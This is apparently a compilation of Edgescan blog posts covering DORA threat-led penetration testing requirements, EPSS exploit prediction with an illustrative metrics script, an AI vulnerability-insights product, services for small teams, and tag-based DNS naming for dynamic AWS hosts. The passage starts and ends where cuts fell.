The above criteria have been tested to ensure that only the biggest and most appropriate financial entities will become subject to TLPT requirements. Indeed, a specific set of financial criteria has been clarified and established in the RTS on TLPT (Article 2).

The TLPT Authority will inform financial entities if they are required to undergo a TLPT. Given the extent of the undertaking, we would expect the TLPT Authority to provide ample notice to the relevant organisations where this will apply. Once this is known, the TLPT Authority will provide three months’ notice to begin the actual preparation phase of the test.

#### TLPT Roles

- TLPT Authority: This is a government authority which operates at the jurisdiction level. It will appoint individuals (a Test Manager and a TLPT Cyber Team [TCT]) who will work with the financial entity in planning the TLPT and will be the ultimate audience for the test results and final reports.
- Financial Entity: A number of roles exist within the entity under test:
  - Control Team: This consists of a control team lead who coordinates all activities within the organisation. The rest of the control team should consist of any other individuals who will help coordinate the overall test. This will be the only team within the organisation that is aware of all aspects of the TLPT, and it will need to exercise a high degree of secrecy.
  - Blue Team: These are the defenders within the organisation. During the testing phases of the TLPT, the blue team will not be aware that the TLPT is taking place. However, for final reporting the blue team’s input will be required, to match up against the red teaming activities (i.e. to see whether certain attacks were detected and/or blocked).
- Threat Intelligence Provider: Third-party provider for the threat intelligence activities. They will produce a set of test scenarios based on known current attacks and industry-specific attacks. These scenarios will be presented to the Red Team Provider for execution.
- Red Team: Third-party provider for the red teaming and actual testing activities. In the context of a TLPT, this would be Edgescan. See below for more details on the testing process.
- Internal testers: The latest RTS clarifications now allow for the use of internal testers as part of a TLPT (see note below).

#### What does a TLPT look like in practice?

Testing Process: This largely follows the TIBER-EU process, which is broken into the standard phases of preparation, testing and closure.
Rather than go into the full TLPT process, we will only highlight some of the important aspects to consider.It should be noted however, that a TLPT will be a significant undertaking, in comparison to standard ‘business as usual’ penetration tests.Preparation Phase: The control team is formed, scoping takes place, the Threat Intelligence and Red Team Provers are selected by the financial entity. The high-level scope of the test is signed off by the TLPT Authority and this is shared with the external Threat Intelligence and Red Team Providers. The control team must consult with the TLPT Authority on their risk assessments or measures, which have been identified, before any testing begins.Testing Phase – This is comprised of three parts:Threat Intelligence Provider: This is where the scenarios which are to be tested are produced, based on real world threats with an appropriate provider. This provider should cover both the targets and threats relevant to the organisation being tested. At least three scenarios devised by the Threat Intelligence provider are chosen by the control team and will form the basis of the red team tests. The scenarios and plans all need approval by the TLTP Authority before actual testing. This process will likely last about four weeks. Edgescan will work closely with the Threat Intelligence provider.Red Team Test Plan: The Red Team provider (e.g. Edgescan) will prepare the test plan, according to the requirements laid down in the RTS for TLPT (Annex IV), which includes information on:• Communication channels• Tactics and techniques allowed and prohibited• Risk management measures• Detailed descriptions, plans and timelines for each test scenarioActive Red Team Testing: This phase must take place over a minimum of 12 weeks, to allow for testers to mimic ‘stealthy’ threat actors. TLPTs are ultimately a covert exercise and an element of secrecy around testing activities must be maintained. 
The exact duration of this phase will be fine-tuned in agreement with the TLTP Authority. The Red Team must be comprised of a red team manager and at least two other red team testers. This is obviously a large and expensive undertaking and one that will evolve and take shape over the coming years. Some further guidance on the exact requirements and shape of these tests will come from the TLPT Authority within each jurisdiction. During this phase, a range of tactics and techniques are employed, such as:Reconnaissance: Collecting as much information as possible on a targetWeaponization: Analysing information on the infrastructure, facilities and employees and preparing for the operations specific to the targetDelivery: The active launch of the full operation on the targetExploitation: Compromising the networks, servers, applications of the financial entitle and exploiting its staff through techniques such as social engineeringControl & Movement: Attempts to move from one compromised system to further vulnerable or high value ones – also known as pivoting or lateral movement.‘Leg-ups’ can also be used during testing – this is where some extra help by the organisation is provided, such as additional access or information, in order to remove a testing blocker to facilitate continuation of testing. These are, of course, documented as such.Closure Phase: Only during this phase is the actual TLPT revealed to the blue team. Initial draft reports are prepared by the Red Team for review by the control team.The blue and red teams must also come together no later than 10 weeks after the end of red team testing phase. This is in order to replay relevant actions and defences that were carried out during the test and is known as a purple teaming exercise (see note below), which is now mandatory.This phase also includes reporting by the red team, identification of any weaknesses, the attack paths, flags obtained and any other relevant technical data. 
Additionally, blue team reports are also prepared at this stage.Finally a test summary report and any remediation plans, will be shared with the TLPT Authority for review and sign off.Lastly there is also a cleanup phase which includes the secure deletion of data that may have been collected during testing and removal of any ‘testing artifacts’.Purple TeamingThe red team (representing attackers) and blue team (representing defenders), working together collaboratively are known as purple teaming. Purple teaming is now mandatory in the closure phase of a TLPT.Internal TestersThis area is one of the key differences introduced by DORA versus the TIBER-EU framework and allows for the use of internal testers, with a few stipulations. For example they should be independent, suitably experienced and their use must not negatively impact the organisation (e.g. by taking them away from other work duties). To qualify, they must also have worked at the organisation for at least one year (this requirement was eased in the last RTS). It also states that every third TLPT tests should include the use of external testers, i.e. using external testers at least once in a nine year period. The full requirements for internal testers can be found in the RTS for TLPT Article 13.Tester RequirementsRequirements for the testers who can conduct TLPT is laid out in Article 27 of DORA and also with further clarification in the RTS for TLPT Article 5. These are similar to those requirements in the TIBER-EU framework, with some modifications.The recent RTS document provided, has given some clarification on the initially strict minimum requirements for those conducting TLPT. The main factor which has changed, removes the chicken and egg scenario, whereby originally those conducting TLPT must have prior experience in conducting a TLPT. 
The requirement has now been widened to more practical prior experience in 'penetration testing and red teaming'. Given the strict requirements, the update also allows financial entities to procure providers who do not comply with some of them, provided the entity mitigates any additional risk this may introduce.

- Testing references: the Red Team Provider must provide at least five references from previous assignments related to penetration testing and red team testing.
- Insurance requirements: the Red Team and Threat Intelligence Providers must show adequate insurance provisions for professional indemnity and cover for risks of misconduct and negligence.
- Red Team Manager: there must be at least one, who can demonstrate at least five years of experience in penetration testing and red team testing.
- Red Team Members: there must be at least two other testers, each with at least two years of penetration testing and red team testing experience.
- Additionally, the Red Team Manager and Testers must have a combined participation in at least five previous assignments related to penetration testing and red team testing.
- Finally, testers must be free of conflicts of interest; for example, they must not provide services to, or be employed by, a provider that performs blue team tasks for an organisation which is part of this TLPT.

Joint or Pooled Tests

DORA includes a provision whereby several financial entities can come together and participate in a joint TLPT with shared testing providers. This allows organisations that use the same ICT providers to undergo tests as a group, and accounts for different organisations that might be part of a wider group structure, to facilitate joined-up tests. These types of tests will likely require extra planning and management overhead.

Edgescan Insight: While the requirements around TLPTs are now clearer, the practical execution of these tests will not happen for some time, likely starting in 2027.
As we progress through the start of 2025, we should continue to receive further clarity from each Authority, and we will continue to provide updates around DORA on our blog. We will be positioned to execute the testing required during a TLPT when this requirement needs to be executed (estimated closer to 2027), and we will work closely with several Threat Intelligence providers to help our clients complete this requirement.

The DORA Journey

- 16 January 2023: DORA entered into force
- 17 January 2024: Batch 1 of RTS and ITS technical standards released
- 17 July 2024: Batch 2 of RTS and ITS technical standards released
- 17 January 2025: DORA and technical standards (RTS & ITS) apply
- Late 2026 / Early 2027: First TLPTs will start

What is TIBER-EU?

TIBER-EU is a European framework for conducting threat intelligence-based red teaming tests, introduced in 2018. It outlines the tactics, techniques and procedures (TTPs) that should be employed during testing, based on bespoke threat intelligence. TIBER-EU brings together a number of entities within organisations themselves and outlines the third-party providers that are required to carry out the red team capability and the threat intelligence capability. These providers work together with the organisation to conduct testing.

How We Can Help - Get in Touch!

Testing, Reporting and Remediation

The most relevant part of DORA is centred on resilience testing, which mandates annual penetration testing for critical applications and systems. This is where Edgescan can help.

Penetration Testing

The good news is that most of the types of testing required by the regulation are items that financial services organisations will be well familiar with; indeed, the majority will already have ongoing security testing programmes that include these items.
Once organisations identify their critical systems in scope, we can onboard them and start testing immediately. We already provide penetration testing services globally via our platform, in the form of Penetration Testing as a Service (PTaaS). Our testing methodology more than meets the current criteria to cover the annual tests highlighted in DORA. Extensive reporting via the platform gives you an ongoing view of the security posture of your critical assets, with reporting metrics and on-demand retesting. With remediation advice direct from our technical testing teams, demonstrating that any vulnerabilities identified have been sufficiently remediated and satisfactorily retested will not be a problem.

Threat-Led Penetration Testing

We already provide objective-based penetration testing (aka Red Teaming) capabilities using our skilled and experienced teams. The goal of standard penetration testing is to find 'all the vulnerabilities' that an adversary could leverage to breach a system or organisation.
Red Teaming can be thought of as a narrow-scope penetration test, whereby you focus on an objective or end goal and leverage vulnerabilities to achieve that objective.

We will continue to keep a close eye on upcoming announcements from the ESAs and will issue further updates on our blog (link) for any official communication in relation to DORA. If you are curious about our ongoing resilience testing, or indeed any other aspect of TLPT or objective-based testing, please contact our sales team at sales@edgescan.com.

References

- Digital Operational Resilience Act
- DORA RTS on TLPT
- Central Bank of Ireland – DORA
- European Central Bank – TIBER-EU Framework

Useful Acronyms

- DORA: Digital Operational Resilience Act
- ECB: European Central Bank
- EBA: European Banking Authority
- ESMA: European Securities and Markets Authority
- EIOPA: European Insurance and Occupational Pensions Authority
- ESA: European Supervisory Authority (the ESAs comprise the EBA, EIOPA and ESMA)
- ITS: Implementing Technical Standards
- NIS2: Network & Information Security 2 Directive
- PTaaS: Penetration Testing as a Service
- RTS: Regulatory Technical Standards
- TCT: TLPT Cyber Team
- TIBER-EU: Threat Intelligence-Based Ethical Red teaming (EU)
- TLPT: Threat-Led Penetration Testing
- TTP: Tactics, Techniques, and Procedures

### Shedding Light on Exploit Prediction

Edgescan Partners with FIRST.org and Cyentia

At Edgescan, we constantly seek ways to enhance our vulnerability management capabilities and provide our clients with the most effective security insights. We're proud to have partnered with FIRST.org and the Cyentia Institute on their report "A Visual Exploration of Exploitation in the Wild". This study examines the performance of the Exploit Prediction Scoring System (EPSS) and offers valuable insights into vulnerability exploitation patterns.

Understanding EPSS and Its Importance

EPSS is a data-driven system designed to estimate the likelihood that a published vulnerability will be exploited in the wild.
As the security landscape evolves, tools like EPSS become increasingly important for prioritizing remediation effectively. The report provides an in-depth analysis of EPSS performance and compares it to other popular vulnerability scoring systems.

Key Findings from the Report

Exploitation Patterns: The study reveals that exploitation activity is far from static. While nearly 14,000 vulnerabilities have evidence of exploitation, only about 10,000 had observed activity in 2023. This highlights the importance of continuously monitoring and reassessing vulnerability risk.

EPSS Performance: Each successive version of EPSS has shown improved performance in predicting exploitation. The latest version demonstrates strong results across a range of scores, offering organizations the flexibility to tailor their remediation strategies to their risk tolerance and capabilities.

Comparison with CVSS: Compared to the Common Vulnerability Scoring System (CVSS), EPSS performs better at predicting exploitation. For equivalent levels of effort, EPSS achieves almost 3x the coverage and over twice the efficiency of CVSS.

Widespread Exploitation is Rare: Interestingly, the report found that widespread exploitation across organizations is uncommon. Half of all known exploited CVEs are never observed by more than 0.02% of organizations. This underscores the need for context when assessing exploitation reports.

Implications for Vulnerability Management

These findings have significant implications for how we approach vulnerability management:

Dynamic Prioritization: The fluctuating nature of exploitation activity emphasizes the need for dynamic, data-driven prioritization strategies.

Balancing Act: Using EPSS for remediation prioritization requires balancing coverage (the share of actually-exploited vulnerabilities your remediation catches), efficiency (the share of what you remediate that turns out to be exploited) and effort (how much you remediate), based on an organization's specific risk profile and resources.

Context Matters: Not all "exploited in the wild" reports are equal.
It's crucial to consider the scope and prevalence of exploitation when assessing risk.

Long-Term Vigilance: While new vulnerabilities often grab headlines, the data shows that attackers continue to target older vulnerabilities. This highlights the importance of maintaining comprehensive, long-term vulnerability management programs.

How Edgescan Leverages These Insights

At Edgescan, we're committed to incorporating these insights into our vulnerability management solutions. By integrating EPSS scores and considering the patterns revealed in this study, we can offer our clients more refined and effective prioritization strategies. We're exploring ways to:

- Incorporate EPSS scores into our risk scoring algorithms, providing a more nuanced view of exploitation likelihood.
- Develop dynamic dashboards that reflect the changing nature of exploitation activity over time.
- Offer customizable prioritization thresholds based on individual client risk tolerances and resource capabilities.
- Provide context-rich reporting beyond binary "exploited/not exploited" classifications.

Looking Ahead

The "Visual Exploration of Exploitation in the Wild" report offers a wealth of insights that will shape the future of vulnerability management. As partners in this research, we are excited to apply these findings to real-world security challenges. We encourage all security professionals to read the full report to gain a deeper understanding of exploitation patterns and the performance of prediction models like EPSS. By leveraging this knowledge, we can collectively work towards more effective, efficient and risk-aware vulnerability management practices. Stay tuned for more updates on how we're integrating these insights into our services.
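The coverage, efficiency and effort trade-off described under "Balancing Act" above is easiest to see in code. The following is an added illustration, not code from the report, from FIRST.org or from Edgescan. The twelve vulnerabilities (labelled V01 to V12), their scores and their "exploited" ground truth are constructed for the example and do not reproduce the report's figures; the metric definitions are the standard ones used in EPSS evaluation (coverage is recall, efficiency is precision). The example compares a CVSS-threshold strategy with an EPSS-threshold strategy, compares both at an equal effort budget, and turns a coverage target into an EPSS threshold.

```python
"""Coverage, efficiency and effort for threshold-based remediation strategies.

Definitions (as used in EPSS evaluation):
  effort     - fraction of all vulnerabilities you choose to remediate
  coverage   - fraction of actually-exploited vulnerabilities your choice caught (recall)
  efficiency - fraction of your chosen vulnerabilities that were exploited (precision)

The vulnerability list below is constructed for illustration only; the labels,
scores and 'exploited' flags are not real data.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class Vuln:
    label: str
    cvss: float      # CVSS base score, 0-10
    epss: float      # EPSS probability of exploitation in the next 30 days, 0-1
    exploited: bool  # ground truth: exploitation was later observed (constructed)


# Constructed sample: high CVSS does not imply exploitation, and vice versa.
SAMPLE = [
    Vuln("V01", 9.8, 0.95, True),
    Vuln("V02", 9.8, 0.02, False),
    Vuln("V03", 9.1, 0.01, False),
    Vuln("V04", 8.8, 0.70, True),
    Vuln("V05", 8.1, 0.03, False),
    Vuln("V06", 7.5, 0.40, True),
    Vuln("V07", 7.5, 0.01, False),
    Vuln("V08", 6.5, 0.55, True),   # medium CVSS, but exploited
    Vuln("V09", 5.3, 0.01, False),
    Vuln("V10", 4.3, 0.30, False),  # EPSS false positive
    Vuln("V11", 3.7, 0.01, False),
    Vuln("V12", 9.0, 0.08, False),
]


def evaluate(vulns, selected):
    """Score a remediation selection against ground truth; returns (effort, coverage, efficiency)."""
    exploited_total = sum(v.exploited for v in vulns)
    true_positives = sum(v.exploited for v in selected)
    effort = len(selected) / len(vulns)
    coverage = true_positives / exploited_total if exploited_total else 0.0
    efficiency = true_positives / len(selected) if selected else 0.0
    return round(effort, 4), round(coverage, 4), round(efficiency, 4)


def by_threshold(vulns, attr, threshold):
    """Remediate everything whose score is at or above the threshold."""
    return [v for v in vulns if getattr(v, attr) >= threshold]


def top_k(vulns, attr, k):
    """Remediate only the k highest-scoring items: a fixed effort budget."""
    return sorted(vulns, key=lambda v: getattr(v, attr), reverse=True)[:k]


def compare_at_equal_effort(vulns, k):
    """Same budget, two orderings: which one catches more of what was actually exploited?"""
    return {
        "cvss": evaluate(vulns, top_k(vulns, "cvss", k)),
        "epss": evaluate(vulns, top_k(vulns, "epss", k)),
    }


def epss_threshold_for_coverage(vulns, target_coverage):
    """Lowest EPSS threshold that reaches the coverage target, and the effort it costs.

    Walking down the EPSS ranking and stopping once coverage is met turns a
    risk-tolerance statement ("catch 75% of what gets exploited") into a threshold.
    """
    ranked = sorted(vulns, key=lambda v: v.epss, reverse=True)
    exploited_total = sum(v.exploited for v in vulns)
    caught = 0
    for i, v in enumerate(ranked, start=1):
        caught += v.exploited
        if exploited_total and caught / exploited_total >= target_coverage:
            return v.epss, round(i / len(vulns), 4)
    return 0.0, 1.0  # target unreachable without fixing everything


if __name__ == "__main__":
    print("CVSS >= 7.0  ->", evaluate(SAMPLE, by_threshold(SAMPLE, "cvss", 7.0)))
    print("EPSS >= 0.30 ->", evaluate(SAMPLE, by_threshold(SAMPLE, "epss", 0.30)))
    print("top-4 by each ->", compare_at_equal_effort(SAMPLE, 4))
    print("EPSS threshold for 75% coverage ->", epss_threshold_for_coverage(SAMPLE, 0.75))
```

In practice the EPSS probabilities come from the FIRST.org daily feed and move over time, and coverage can only be measured retrospectively against observed exploitation (KEV, telemetry or your own incident data). That is why the thresholds have to be recomputed rather than set once, which is the "dynamic prioritization" point made above.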
### AI Security

Excerpt: Recently, there has been an explosion in the use of LLMs (Large Language Models) and Generative AI (Artificial Intelligence) by organisations looking to improve their online customer experience.

### Enhancing Cyber Security with AI Insights by Edgescan

Edgescan AI Insights is designed to provide guidance on questions such as:

- "What vulnerabilities should we focus on?"
- "What developer training would help improve our security posture?"
- "Which assets are potentially exposed to ransomware attack?"

Live Fast Die Young

In today's rapidly evolving digital landscape, organizations face an ever-increasing number of cyber threats. The challenge of maintaining a strong cyber security posture is more critical than ever, yet traditional methods often fall short in providing timely and actionable insights. There are many badges of "honor" (big oversized question mark), and endless war stories a lot of us have lived through, that tell us we are overrun: large expanses of data, too many vulnerabilities, lack of context, poor risk prioritization, and essentially not knowing what to fix first! And all on 4 hours of sleep. SOC burnout is increasingly on the rise, which is not the healthiest topic of conversation when looking at an entry point into a "rewarding career" in any given industry. It is abundantly evident that security analysts across the Enterprise and MSS/MSP space need more direct help and less "faff and waffle" when it comes to making decisions and taking next steps in reducing cyber risk in their respective working environments.

Help Has Arrived: AI Insights by Edgescan

AI Insights by Edgescan addresses these problems by leveraging AI to provide real-time cyber security insights, empowering organizations to make informed decisions and enhance their security measures.
By analyzing vulnerability data with the AI-Powered Insights engine, AI Insights delivers personalized, tactical and strategic recommendations to mitigate risk, prioritize remediation efforts and maintain compliance.

Key Features of AI Insights

AI-Powered Cyber Security Insights: AI Insights uses Edgescan's AI-Powered Insights engine to provide real-time analysis of vulnerability data.
- Real-Time Analysis: instantly analyzes vulnerability data to provide immediate insights.
- Personalized Insights: delivers tailored insights based on your organization's specific vulnerability data.

Ransomware Risk Assessment: To combat the ever-present threat of ransomware, AI Insights includes:
- Vulnerability Indicators: evaluates discovered vulnerabilities to assess ransomware risk.
- Exposure Focus: identifies which exposures should be prioritized to minimize breach risk.

Remediation Prioritization: AI Insights helps organizations address the most critical issues first with:
- Threat-Based Prioritization: uses real-world threat analysis, ransomware intelligence and threat metadata to determine which issues to address first.

Compliance Guidance: Maintaining compliance with various security frameworks is simplified with AI Insights:
- Framework Compliance: provides guidance to support compliance with frameworks such as CIS, PCI DSS, DORA, HIPAA, ISO, SOC 2, GDPR and more.

Training Focus: AI Insights helps improve organizational skills and reduce vulnerabilities by:
- Educational Recommendations: suggests where to allocate developer and technical education budgets based on trends in vulnerabilities, their rate of occurrence and associated risk.

Exploitable Vulnerabilities: AI Insights offers information on vulnerabilities and exploit code:
- Exploit Code Insight: provides information on current open vulnerabilities and associated public exploit code to aid prioritization decisions.

Anomaly Detection: AI Insights enhances security monitoring by detecting unusual patterns:
- Estate-Wide Trends: identifies significant weak spots, vulnerability clustering, exposure frequency and business unit security posture.
- Cyber Trends: highlights anomalies and trends that deviate from the norm across your security landscape.

Dynamic and Scalable Insights: AI Insights adapts to your organization's needs with:
- Large Dataset Analysis: analyzes a landscape of over 15,000,000 verified vulnerabilities to generate actionable insights and trending information.
- Organizational and Unit-Level Insights: provides insights specific to a single organization or shared across multiple organizations and business units.
- Adaptive Insights: continuously updates as your business and security posture evolve.
- Rapid Response: links report data to live vulnerabilities for quick action.

Benefits of AI Insights

Implementing AI Insights by Edgescan offers numerous advantages, including:
- Enhanced Security Posture: gain real-time, personalized insights and prioritize remediation efforts effectively.
- Risk Mitigation: focus on reducing risk associated with ransomware and other cyber threats.
- Compliance Catch-Up: maintain and streamline compliance with critical security frameworks.
- Improved Training: guide investment in education to reduce vulnerability recurrence and improve overall security expertise.
- Informed Decision-Making: access detailed, actionable insights to make data-driven security decisions.
- Proactive Threat Management: detect and address anomalies and trends that could signify emerging threats.

Conclusion

AI Insights by Edgescan is a dynamic and robust solution for organizations aiming to enhance their cyber security through intelligent, real-time analysis and actionable insights. It empowers security teams with the tools needed to prioritize vulnerabilities, comply with regulatory standards, and invest wisely in security training and resources. For the modern CISO, AI Insights is a tool to stay ahead of cyber threats and maintain a strong security posture.

Figure 1. AI Insights dashboard.

### Edgescan: Simplified Security for Small Teams

In my role at Edgescan, I often come across teams with 1 to 5 InfoSec professionals. These teams typically include a mix of security-minded, development-focused and administrative roles, with a leader spearheading their efforts. While each team and organization is different, one factor remains the same across every program: everyone is trying to do as much as they can with the people and budget they are allocated. With that in mind, I've listed the five most common ways that Edgescan helps teams that feel the pain of tight budgets and resource scarcity.

5 Ways Edgescan Helps Small Security Teams Succeed

1. Getting Onboard: No Tool Configuration or Maintenance Required

With Edgescan, the work of configuring and maintaining scanners isn't put on you and your team. Simply tell us what you need tested, and we'll handle the setup. Our asset blocker workflow even alerts you to issues (such as DNS resolution) preventing thorough scanning. If we're scanning on your internal or private network, we'll build a virtual machine for you; all you need to do is deploy it.

2. Getting Real Vulnerability Data: Hybrid Vulnerability Triage

I think we're all in agreement that no one likes false positives and false negatives. Our hybrid approach to validation uses AI, analytics and human expertise to validate vulnerabilities efficiently. We auto-validate low-hanging fruit and have pen testers manually review high/critical vulns to weed out false positives and negatives.
For your team, this means you can spend more time making critical remediations and less time working through the noise that scanners produce.

3. Context and Narrative: Simplifying Prioritization with Key Metrics and Factors

Edgescan provides five levers for prioritization: EVSS (Edgescan Validated Security Score), CVSS, EPSS (Exploit Prediction Scoring System, by FIRST.org), CISA KEV and EXF (Edgescan Exposure Factor, an aggregated risk score to ensure that each remediation has a tangible impact on overall risk across all regulatory bodies). We provide all of these levers to help you prioritize remediations. Beyond scoring systems, each vulnerability that Edgescan presents includes detail on the impact of the vulnerability should an attacker use this attack path. This is all part of an effort to help you easily determine which fixes will have the greatest impact for your organization and reduce risk across any applicable framework.

4. Simplifying Fixes: Step-by-Step Remediation Guidance

For each vulnerability, Edgescan spells out the methods to remediate or patch the issue identified. If there's a simple fix, such as "update to version X", we'll include the links so your team doesn't have to scour the web. We'll also provide any associated CVEs, CWEs and/or CIS Control violations. No more guessing how to fix issues or wondering if you've closed gaps: we give you a clear roadmap.

5. Help From Experts: Expert-Led Support for Everybody

If you ever have a question or just want some advice, every Edgescan client, regardless of package, has access to our in-house team of CREST and OSCP certified pen testers. Each and every one of our clients, regardless of size or spend, gets the answers and expertise necessary to understand the impact of vulnerabilities and of the remediations made.

In Conclusion: Do More With the Resources You Have

We understand, more than most, the time and effort that tools create.
We also understand how hard it is to get a pentest done and then hope that your remediations take effect before the next assessment. Nobody likes being surprised come audit time! Edgescan was created by pen testers to solve the problems they experienced when they were in the thick of it, just like you and your teams. We take care of all of the work leading up to remediation, so you can do more with less. Get more for your security with your existing budget by partnering with Edgescan. Contact us to learn more about simplifying security for your team.

### Change for the Sake of Change: Dealing with Dynamic AWS Hosts

"The only constant is change itself." Who would have thought words from two and a half millennia ago could ring so true in the world of cyber security and cloud computing in 2024? Well, here we are, creating and inventing at an astronomical pace, and making sure we do so securely. I'm afraid not. A few of us thought "secure by design" was going to lead us to a new job, and a move to another industry, but alas, we are busier than ever, and it is not relenting.

Change is All Around

The pace and, more importantly, the frequency of change are now the new normal. Whether it is daily or hourly code pushes, virtual image refreshes, patching updates or dynamic cloud asset refreshes, we are living with systems that are constantly moving and changing. As both of these parameters increase across cloud environments, our need for the aforementioned creating and inventing becomes greater and greater, and our need for continuous visibility, monitoring and "proactive everything" has never been more necessary.
Threats and vulnerabilities, or "exposures", are out of control, and there is a never-ending production line of bad actors scooping up the free chips. We were always told, "It is recommended you conduct a pen test following any significant change to your infrastructure." So that's daily, then!

In 2022, we were reliably informed by Gartner that threat and vulnerability management programs are no longer working, that they are failing drastically (I suppose the numbers of unfixed vulnerabilities lying around speak for themselves) and that they are no longer enough. We must "broaden the net" by implementing a CTEM approach, taking in greater scope and discovery, then "narrow the net" through prioritization and validation, before finally mobilizing the troops. All of which sounds very much like what we have been doing here at Edgescan for a while now. But anyway... more change.

The Dynamic Cloud

With the continued adoption of more and more cloud services, the Edgescan team has been busy beavering away to make AWS users' lives a little easier. They are solving a significant problem that can be quite a pain, particularly when the audit and compliance police are knocking on your door looking for asset inventory reports and historical vulnerability reports from said dynamic cloud assets.

Many enterprises benefit greatly from the dynamic nature of cloud environments. While they rightly use best practices to manage and optimize their cloud assets, this does not always present an ideal state for a third-party vendor or security partner to offer real value and insight from their solutions. The default position for security partners was looking from the outside in, which prevented them from delivering the exact services and value they claim to provide.

Part of the Edgescan Platform today provides customers with the ability to see and monitor their external attack surface through an integrated ASM product.
This gives the requisite "visibility and monitoring of change" on the external perimeter of the enterprise, with API Discovery, Host Discovery, Domain Investigation and custom alerting. It integrates with our validated vulnerability management offering across both the host layer and layer 7, for the kind of coverage those Gartner folks were speaking about three paragraphs ago.

When you move from external to internal or "private" IP space in the cloud, things tend to get a little trickier. This is why we have created the ability to tag AWS internal host infrastructure within the Edgescan Platform.

AWS Internal Host Infrastructure Tagging

AWS tagging is an effective way to manage your cloud resources and gain best-practice insight into cloud operations and security. Due to the dynamic nature of cloud infrastructure, many AWS users rely on tags to identify their EC2 instances. Edgescan uses these tags, instead of IP addresses, as scan targets, enabling us not only to track vulnerabilities across multiple scans but also to present targets more descriptively to our user base.

What is this? Edgescan AWS tagging for internal AWS host infrastructure.

How does it work? We use a custom DNS server that automatically updates DNS records based on the tags on your EC2 instances, so that scanners can target an instance by a stable name rather than by an IP address that changes on every refresh.

Who can use it? Any Edgescan customer who uses AWS internal host infrastructure.

What problem does it solve? Dynamic cloud IP addresses are impractical to track by manual means, so continuity of historical data and consistent reporting from these cloud assets has always been a problem. Edgescan AWS tagging resolves the problem of tracking and reporting on dynamic or ephemeral IP addresses in the AWS cloud.

Closing Remarks

In closing, it still looks like we are not that good at dealing with all this change from a systematic cyber security perspective.
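To make the tag-to-name mechanism described above concrete, here is an added example of the idea; it is not Edgescan's implementation, whose internals the post does not describe. It assumes a private zone called scan.internal and the tag keys Name and Environment. The instance records are constructed inline in the shape that boto3's describe_instances returns (InstanceId, State, PrivateIpAddress, Tags), so it runs offline. It shows the scan target keeping the same name across an instance refresh while the IP changes, and it handles the cases that bite in practice: instances that are not running, instances with no Name tag, tag values that are not valid DNS labels, and two running instances that share a name.

```python
"""Stable DNS names for ephemeral EC2 private IPs, keyed on instance tags.

Added illustration only (not Edgescan's implementation). The instance
records mirror the fields boto3's describe_instances returns, but the
data below is constructed inline so the script runs offline.
"""
import re

ZONE = "scan.internal"                   # assumed name of a private hosted zone
_LABEL_BAD = re.compile(r"[^a-z0-9-]+")  # anything not allowed in a DNS label


def tag_value(instance, key):
    """Return the value of tag `key`, or None if the instance lacks it."""
    for tag in instance.get("Tags", []):
        if tag["Key"] == key:
            return tag["Value"]
    return None


def to_label(value):
    """Normalise a tag value into a lowercase DNS label (RFC 1123 style, max 63 chars)."""
    label = _LABEL_BAD.sub("-", value.strip().lower()).strip("-")
    return label[:63]


def build_records(instances, name_tag="Name", env_tag="Environment", zone=ZONE):
    """Map running instances to {fqdn: private_ip}, keyed on tags rather than IPs.

    Returns (records, skipped). An instance is skipped, with a reason, when it is
    not running, has no name tag, or has no private IP. When two running instances
    share a name, both get the instance id prepended so neither silently disappears.
    """
    groups, skipped = {}, []
    for inst in instances:
        state = inst.get("State", {}).get("Name")
        if state != "running":
            skipped.append((inst["InstanceId"], f"state={state}"))
            continue
        name = tag_value(inst, name_tag)
        ip = inst.get("PrivateIpAddress")
        if not name:
            skipped.append((inst["InstanceId"], f"no {name_tag} tag"))
            continue
        if not ip:
            skipped.append((inst["InstanceId"], "no private IP"))
            continue
        env = to_label(tag_value(inst, env_tag) or "default")
        label = to_label(name) or to_label(inst["InstanceId"])  # fall back if the tag is all junk
        fqdn = f"{label}.{env}.{zone}"
        groups.setdefault(fqdn, []).append((inst["InstanceId"], ip))
    records = {}
    for fqdn, members in groups.items():
        if len(members) == 1:
            records[fqdn] = members[0][1]
        else:
            for instance_id, ip in members:
                records[f"{to_label(instance_id)}.{fqdn}"] = ip
    return records, skipped


def diff_records(old, new):
    """Show what a refresh changed. Same name, new IP is the common case."""
    return {
        "added": {n: ip for n, ip in new.items() if n not in old},
        "removed": {n: ip for n, ip in old.items() if n not in new},
        "changed": {n: (old[n], new[n]) for n in old if n in new and old[n] != new[n]},
    }


def render_zone(records, ttl=60):
    """Emit A records with a short TTL so scanners pick up churn before the next run."""
    return [f"{fqdn}. {ttl} IN A {ip}" for fqdn, ip in sorted(records.items())]


def _inst(instance_id, ip, state="running", **tags):
    """Build a constructed describe_instances-style record."""
    return {"InstanceId": instance_id, "State": {"Name": state}, "PrivateIpAddress": ip,
            "Tags": [{"Key": k, "Value": v} for k, v in tags.items()]}


# Constructed snapshot before an instance refresh.
SNAPSHOT_BEFORE = [
    _inst("i-0a1b2c3d4e5f60001", "10.0.1.15", Name="web-01", Environment="Prod"),
    _inst("i-0a1b2c3d4e5f60002", "10.0.1.16", Name="web-02", Environment="Prod"),
    _inst("i-0a1b2c3d4e5f60003", "10.0.2.40", Name="Batch Worker", Environment="prod"),
    _inst("i-0a1b2c3d4e5f60004", "10.0.3.9", Role="bastion"),                       # no Name tag
    _inst("i-0a1b2c3d4e5f60005", "10.0.1.99", state="stopped", Name="web-01", Environment="Prod"),
]
# After the refresh: web-01 is a new instance with a new IP, and a second web-02 appeared.
SNAPSHOT_AFTER = [
    _inst("i-0a1b2c3d4e5f60006", "10.0.1.23", Name="web-01", Environment="Prod"),
    _inst("i-0a1b2c3d4e5f60002", "10.0.1.16", Name="web-02", Environment="Prod"),
    _inst("i-0a1b2c3d4e5f60007", "10.0.1.77", Name="web-02", Environment="Prod"),
    _inst("i-0a1b2c3d4e5f60003", "10.0.2.40", Name="Batch Worker", Environment="prod"),
]

if __name__ == "__main__":
    before, skipped = build_records(SNAPSHOT_BEFORE)
    after, _ = build_records(SNAPSHOT_AFTER)
    print("\n".join(render_zone(after)))
    print("skipped:", skipped)
    print("refresh diff:", diff_records(before, after))
```

With live data you would feed build_records the flattened Reservations[].Instances[] list from describe_instances and publish the rendered records into the zone your scanners resolve against. The diff is the useful operational signal: a "changed" entry is the normal refresh, while "added" and "removed" entries mean the asset inventory itself moved and someone should look.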
We are undoubtedly coming up with solutions after the problems have been created. Will this ever change? Probably not. Do we want it to change? Probably not.

### Beyond Scanners: How In-Depth Pen Tests Strengthen Cyber Defenses

